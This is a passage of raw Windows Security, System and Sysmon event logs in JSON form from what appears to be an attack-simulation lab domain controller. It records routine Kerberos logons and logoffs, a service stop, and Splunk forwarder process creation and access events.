Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xad140","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220677,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xAD140\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54961\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xad140","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54961","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220678,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAD140\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xad140","LogonType":"3","EventReceivedTime":"2020-08-01 05:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220679,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64AD1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64ad1","LogonType":"3","EventReceivedTime":"2020-08-01 05:53:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76859,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The State Repository Service service entered the stopped state.","param1":"State Repository Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:53:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nProcessGuid: {A837DB8D-036E-5F25-0000-00105ADB0A00}\r\nProcessId: 4848\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","ProcessGuid":"{A837DB8D-036E-5F25-0000-00105ADB0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-00105ADB0A00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-00105ADB0A00}","TargetProcessId":"4848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-00105ADB0A00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-00105ADB0A00}","TargetProcessId":"4848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 